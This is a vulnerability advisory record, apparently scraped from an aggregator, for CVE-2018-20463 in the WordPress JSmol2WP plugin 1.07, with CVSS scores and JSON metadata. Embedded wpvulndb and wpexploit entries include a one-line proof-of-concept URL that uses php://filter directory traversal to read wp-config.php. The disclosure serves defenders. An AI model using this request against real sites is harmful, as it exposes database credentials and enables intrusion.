WordPress JSmol2WP plugin <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF) vulnerability

2019-01-08T00:00:00

Description

Unauthenticated Server Side Request Forgery (SSRF) vulnerability found in WordPress JSmol2WP plugin (versions <= 1.07). ## Solution 08.01.2019 - we were unable to find a patched version of this plugin. According to WordPess.org plugin repository, this plugin was closed on January 7, 2019 and is no longer available for download.

Affected Software

CPE Name	Name	Version
	jsmol2wp	1.07

{"id": "PATCHSTACK:990D0DA4B00AECF3F26E7A8815EB81D4", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress JSmol2WP plugin <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF) vulnerability", "description": "Unauthenticated Server Side Request Forgery (SSRF) vulnerability found in WordPress JSmol2WP plugin (versions <= 1.07).\n\n## Solution\n\n\r\n 08.01.2019 - we were unable to find a patched version of this plugin. According to WordPess.org plugin repository, this plugin was closed on January 7, 2019 and is no longer available for download.\r\n ", "published": "2019-01-08T00:00:00", "modified": "2019-01-08T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://patchstack.com/database/vulnerability/jsmol2wp/wordpress-jsmol2wp-plugin-1-07-unauthenticated-server-side-request-forgery-ssrf-vulnerability", "reporter": "N/A", "references": ["https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS", "https://wordpress.org/plugins/jsmol2wp/#developers"], "cvelist": ["CVE-2018-20463"], "immutableFields": [], "lastseen": "2022-06-01T19:37:34", "viewCount": 1, "enchantments": {"score": {"value": 3.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-20463"]}, {"type": "wpexploit", "idList": ["WPEX-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611"]}]}, "affected_software": {"major_version": [{"name": "jsmol2wp", "version": 1}]}, "vulnersScore": 3.6}, "_state": {"score": 1660007784, "dependencies": 1660004461, "affected_software_major_version": 1666695388}, "_internal": {"score_hash": "ab4516b101c26fc0553f69a92a32e5ab"}, "affectedSoftware": [{"version": "1.07", "operator": "le", "name": "jsmol2wp"}], "vendor_cvss": {"score": "3.1", "severity": "Unknown severity"}, "owasp": "A5: Security Misconfiguration", "classification": "Server Side Request Forgery (SSRF)"}

{"cve": [{"lastseen": "2022-03-23T15:51:32", "description": "An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. There is an arbitrary file read vulnerability via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. This can also be used for SSRF.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-12-25T21:29:00", "type": "cve", "title": "CVE-2018-20463", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-20463"], "modified": "2019-01-09T16:02:00", "cpe": ["cpe:/a:jsmol2wp_project:jsmol2wp:1.07"], "id": "CVE-2018-20463", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-20463", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:jsmol2wp_project:jsmol2wp:1.07:*:*:*:*:wordpress:*:*"]}], "wpvulndb": [{"lastseen": "2021-02-15T22:21:46", "bulletinFamily": "software", "cvelist": ["CVE-2018-20463"], "description": "The jsmol2wp WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.\n\n### PoC\n\nhttp://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call;=getRawDataFromDatabase&query;=php://filter/resource=../../../../wp-config.php\n", "modified": "2020-09-22T07:26:35", "published": "2018-12-25T00:00:00", "id": "WPVDB-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611", "href": "https://wpscan.com/vulnerability/ad01dad9-12ff-404f-8718-9ebbd67bf611", "type": "wpvulndb", "title": "JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "wpexploit": [{"lastseen": "2021-02-15T22:21:46", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-20463"], "description": "The jsmol2wp WordPress plugin was affected by an Unauthenticated Server Side Request Forgery (SSRF) security vulnerability.\n", "modified": "2020-09-22T07:26:35", "published": "2018-12-25T00:00:00", "id": "WPEX-ID:AD01DAD9-12FF-404F-8718-9EBBD67BF611", "href": "", "type": "wpexploit", "title": "JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)", "sourceData": "http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}

WordPress JSmol2WP plugin &lt;= 1.07 - Unauthenticated Server Side Request Forgery (SSRF) vulnerability

Description

Affected Software

Related

WordPress JSmol2WP plugin <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF) vulnerability